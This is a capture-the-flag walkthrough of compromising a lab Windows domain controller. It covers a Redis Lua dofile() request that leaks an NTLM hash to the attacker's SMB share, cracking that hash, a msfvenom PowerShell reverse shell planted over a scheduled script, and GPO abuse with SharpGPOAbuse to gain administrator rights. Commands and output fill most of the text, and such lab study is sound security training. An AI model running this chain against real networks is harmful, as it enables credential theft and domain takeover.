# Nmap 7.92 scan initiated Tue Dec 14 17:33:28 2021 as: nmap -sSVC -p- -v -oA nmap_full -Pn 10.10.255.87 Nmap scan report for 10.10.255.87 Host is up (0.061s latency). Not shown: 65522 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 6379/tcp open redis Redis key-value store 2.8.2402 49665/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49683/tcp open msrpc Microsoft Windows RPC 49696/tcp open msrpc Microsoft Windows RPC 49722/tcp open msrpc Microsoft Windows RPC Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Tue Dec 14 17:45:23 2021 -- 1 IP address (1 host up) scanned in 715.74 seconds
$ enum4linux-ng -A 10.10.255.87 ... ========================================= | SMB Dialect Check on 10.10.255.87 | ========================================= [*] Trying on 445/tcp [+] Supported dialects and settings: SMB 1.0: false SMB 2.02: true SMB 2.1: true SMB 3.0: true SMB1 only: false Preferred dialect: SMB 3.0 SMB signing required: true ... =================================================== | Domain Information via RPC for 10.10.255.87 | =================================================== [+] Domain: VULNNET [+] SID: S-1-5-21-1405206085-1650434706-76331420 [+] Host is part of a domain (not a workgroup)
=========================================================== | Domain Information via SMB session for 10.10.255.87 | =========================================================== [*] Enumerating via unauthenticated SMB session on 445/tcp [+] Found domain information via SMB NetBIOS computer name: VULNNET-BC3TCK1 NetBIOS domain name: VULNNET DNS domain: vulnnet.local FQDN: VULNNET-BC3TCK1SHNQ.vulnnet.local ...
LUA dofile() allows us to request a file but since we are on Windows it allows
us to request a share as well dofile('//host/share').
So if we launch a SMB server with Responder on one hand and force the server
to request a share on the other hand, we may be able to capture a NTLM hash.
Redis CLI:
1 2 3
10.10.156.87:6379> EVAL "dofile('//10.9.19.77/noraj')" 0 (error) ERR Error running script (call to f_ca7d1737b7cbf25c9d042cce4a3adce566e3e8bd): @user_script:1: cannot open //10.9.19.77/noraj: Permission denied (0.60s)
Let's find the correct handle for NTLMv2 on JtR and HC thanks to haiti.
1 2
$ haiti 'enterprise-security::VULNNET:e3ce6172d5c46f70:C9D337B801D753F7C7A99B86B03E799C:010100000000000000C14A988FF2D7013F2685222C47BE030000000002000800420053005300450001001E00570049004E002D0044003300370033004D0046004A005A0030004F00350004003400570049004E002D0044003300370033004D0046004A005A0030004F0035002E0042005300530045002E004C004F00430041004C000300140042005300530045002E004C004F00430041004C000500140042005300530045002E004C004F00430041004C000700080000C14A988FF2D7010600040002000000080030003000000000000000000000000030000098A6EBD82A72AAFE8801CE20C7E617EA16CC5F12E45BD3FD3F8F6B40F7840A730A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E0039002E00310039002E00370037000000000000000000' NetNTLMv2 [HC: 5600] [JtR: netntlmv2]
Now let's crack it:
1 2 3 4 5 6 7 8 9
$ john hashes.txt -w=/usr/share/wordlists/passwords/rockyou.txt --format=netntlmv2 Using default input encoding: UTF-8 Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status edited (enterprise-security) 1g 0:00:00:03 DONE (2021-12-16 15:25) 0.3021g/s 1212Kp/s 1212Kc/s 1212KC/s sandoval64..sand3465 Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably Session completed
It is always interesting to launch several tools, here smbmap says NO ACCESS
for Enterprise-Share while cme says READ.
Enumerating the files doesn't work with smbmap since it doesn't detect
Enterprise-Share as readable. cme doesn't have the feature to list files of
a SMB share. So we're forced to use the old smbclient or less known tools.
For example nullinux allows to list the 1st depth of files of all shares, but
is not very flexible as you can't specify a share nor choose the depth.
[*] Enumerating: \\10.10.156.87\Enterprise-Share . D 0 Thu Dec 16 15:34:20 2021 .. D 0 Thu Dec 16 15:34:20 2021 PurgeIrrelevantData_1826.ps1 A 69 Wed Feb 24 01:33:18 2021 SRQODJGBTA A 0 Thu Dec 16 15:30:19 2021 ZFBMNPOJDV A 0 Thu Dec 16 15:34:20 2021
[*] Enumerating: \\10.10.156.87\NETLOGON . D 0 Tue Feb 23 10:29:58 2021 .. D 0 Tue Feb 23 10:29:58 2021
[*] Enumerating: \\10.10.156.87\SYSVOL . D 0 Tue Feb 23 10:29:58 2021 .. D 0 Tue Feb 23 10:29:58 2021 vulnnet.local Dr 0 Tue Feb 23 10:29:58 2021
[*] 0 unique user(s) identified
The Impacket version of smbclient is not able to enumerate shares or list their
content (at least with an option) and the auth is not working anyway.
So let's get back to the old smbclient. It's a nightmare but at least if it works.
1 2 3 4 5 6 7 8 9 10 11 12 13
# List shares, just for testing $ smbclient -I 10.10.76.216 -U 'enterprise-security' --password edited --client-protection sign -L 10.10.76.216
# List files $ smbclient -I 10.10.76.216 -U 'enterprise-security' --password edited --client-protection sign '\\10.10.76.216\Enterprise-Share' Try "help" to get a list of possible commands. smb: \> dir . D 0 Tue Feb 23 23:45:41 2021 .. D 0 Tue Feb 23 23:45:41 2021 PurgeIrrelevantData_1826.ps1 A 69 Wed Feb 24 01:33:18 2021
smb: \> get PurgeIrrelevantData_1826.ps1 getting file \PurgeIrrelevantData_1826.ps1 of size 69 as PurgeIrrelevantData_1826.ps1 (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
I guess we have to guess it's part of a scheduled task. Also it can't be
exploited like that and it seems that even if the share is shown as read-only,
we can in fact overwrite the file.
1 2
smb: \> put PurgeIrrelevantData_1826.ps1 putting file PurgeIrrelevantData_1826.ps1 as \PurgeIrrelevantData_1826.ps1 (1.3 kb/s) (average 8.4 kb/s)
The stageless PS reverse shell from msf wasn't working.
1 2 3 4 5
$ msfvenom -p cmd/windows/powershell_reverse_tcp LHOST=10.9.19.77 LPORT=9999 -f ps1 -o PurgeIrrelevantData_1826.ps1 --platform windows -a cmd No encoder specified, outputting raw payload Payload size: 1676 bytes Final size of ps1 file: 8397 bytes Saved as: PurgeIrrelevantData_1826.ps1
PowerShell #1, PowerShell #2 from https://www.revshells.com/ weren't working
(contacting the attacker machine but closing the socket) but hopefully
PowerShell #3 reverse shell worked.
$ ncat -nlvp 9999 Ncat: Version 7.92 ( https://nmap.org/ncat ) Ncat: Listening on :::9999 Ncat: Listening on 0.0.0.0:9999 Ncat: Connection from 10.10.76.216. Ncat: Connection from 10.10.76.216:49826. SHELL> whoami vulnnet\enterprise-security SHELL> whoami /all
USER INFORMATION ----------------
User Name SID =========================== ============================================ vulnnet\enterprise-security S-1-5-21-1405206085-1650434706-76331420-1103
GROUP INFORMATION -----------------
Group Name Type SID Attributes ========================================== ================ ============ ================================================== Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION ----------------------
Privilege Name Description State ============================= ========================================= ======== SeMachineAccountPrivilege Add workstations to domain Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
USER CLAIMS INFORMATION -----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
SHELL> systeminfo
Host Name: VULNNET-BC3TCK1 OS Name: Microsoft Windows Server 2019 Datacenter Evaluation OS Version: 10.0.17763 N/A Build 17763 OS Manufacturer: Microsoft Corporation OS Configuration: Primary Domain Controller OS Build Type: Multiprocessor Free ... System Manufacturer: Xen System Model: HVM domU System Type: x64-based PC Processor(s): 1 Processor(s) Installed. [01]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~2400 Mhz BIOS Version: Xen 4.11.amazon, 8/24/2006 ...
After having lost hours trying to compile C# projects on Linux, in the end even
if PowerSploit is archived and no longer maintain, it's way easier to use
PowerView.
$ smbclient -I 10.10.45.244 -U 'enterprise-security' --password edited --client-protection sign '\\10.10.45.244\sysvol' Try "help" to get a list of possible commands. smb: \> dir . D 0 Tue Feb 23 10:29:58 2021 .. D 0 Tue Feb 23 10:29:58 2021 vulnnet.local Dr 0 Tue Feb 23 10:29:58 2021
9558271 blocks of size 4096. 5139591 blocks available smb: \> cd vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\ smb: \vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> dir . D 0 Tue Feb 23 10:30:37 2021 .. D 0 Tue Feb 23 10:30:37 2021 GPT.INI A 22 Tue Feb 23 10:36:27 2021 MACHINE D 0 Tue Feb 23 22:58:25 2021 USER D 0 Tue Feb 23 10:30:37 2021
9558271 blocks of size 4096. 5139591 blocks available smb: \vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> lcd pol smb: \vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> mask "" smb: \vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> recurse ON smb: \vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> prompt OFF smb: \vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> mget * getting file \vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 22 as GPT.INI (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec) getting file \vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2790 as MACHINE/Registry.pol (25.9 KiloBytes/sec) (average 12.9 KiloBytes/sec) getting file \vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (9.5 KiloBytes/sec) (average 11.7 KiloBytes/sec)
There not much we can see directly.
So let's use BloodHound Powershell Collector: SharpHound.ps1.
smb: \> get 20211217084021_BloodHound.zip getting file \20211217084021_BloodHound.zip of size 8991 as 20211217084021_BloodHound.zip (77.7 KiloBytes/sec) (average 77.7 KiloBytes/sec)
Neo4J works only with Java 8.
1 2
$ sudo archlinux-java set java-8-openjdk/jre $ sudo systemctl status neo4j
Follow neo4j
doc if you need to init the system for the 1st time.
After login, click on Upload Data on BloodHound and select the archive.
Then use the default analysis query Find Shortest Paths to Domain Admins.
We can see our user enterprise-security write the GPO security-pol-vn but
this GPO is applied to all the domain so it allows to take over the domain
admin account or doing many other stuff.
Several techniques to Exploit Group Policy Objects GPO are detailed on PayloadsAllTheThings.
I wanted to use the Abuse GPO with PowerView method but it refers to a very old
version of PowerSploit.
PS C:\Enterprise-Share> gpupdate /force Updating policy... Computer Policy update has completed successfully. User Policy update has completed successfully.
PS C:\Enterprise-Share> net user enterprise-security
It seems the task is never executed, because the task may fail or Add-GPOImmediateTask
may fail to register the task or when the GPO already has a ScheduledTasks.xml
it requires the option -Force to update it but the script was failing when using it.
I found a pre-compiled version of SharpGPOAbuse and verified its integrity:
PS C:\Enterprise-Share> .\SharpGPOAbuse.exe --AddComputerTask --TaskName 'noraj' --Author 'vulnnet\administrator' --Command "powershell.exe /c" --Arguments "net localgroup administrators enterprise-security /add" --GPOName "security-pol-vn" [+] Domain = vulnnet.local [+] Domain Controller = VULNNET-BC3TCK1SHNQ.vulnnet.local [+] Distinguished Name = CN=Policies,CN=System,DC=vulnnet,DC=local [+] GUID of "security-pol-vn" is: {31B2F340-016D-11D2-945F-00C04FB984F9} [+] Creating file \\vulnnet.local\SysVol\vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml [+] versionNumber attribute changed successfully [+] The version number in GPT.ini was increased successfully. [+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle. [+] Done!
PS C:\Enterprise-Share> gpupdate /force
PS C:\Enterprise-Share> net user enterprise-security User name enterprise-security Full Name Enterprise Security Comment TryHackMe User's comment Country/region code 000 (System Default) Account active Yes Account expires Never
Password last set 2/23/2021 3:02:39 PM Password expires Never Password changeable 2/24/2021 3:02:39 PM Password required Yes User may change password Yes
Workstations allowed All Logon script User profile Home directory Last logon 12/24/2021 12:18:05 PM
Logon hours allowed All
Local Group Memberships *Administrators Global Group memberships *Domain Users The command completed successfully.
Again the account was nto appearing in the Administrators group. But running
net user enterprise-security a few minutes later it was appearing. So maybe
PowerGPOAbuse was working too and I just needed to wait the sync (even if
gpupdate says it's done).
We can now connect on the C$ share.
1 2 3 4
$ smbclient -I 10.10.103.170 -U 'enterprise-security' --password edited --client-protection sign '\\10.10.103.170\C$' Try "help" to get a list of possible commands. smb: \> get Users\Administrator\Desktop\system.txt getting file \Users\Administrator\Desktop\system.txt of size 37 as Users\Administrator\Desktop\system.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
[*] Requesting shares on 10.10.103.170..... [*] Found writable share ADMIN$ [*] Uploading file gvGKegKI.exe [*] Opening SVCManager on 10.10.103.170..... [*] Creating service akDa on 10.10.103.170..... [*] Starting service akDa..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.17763.1757] (c) 2018 Microsoft Corporation. All rights reserved.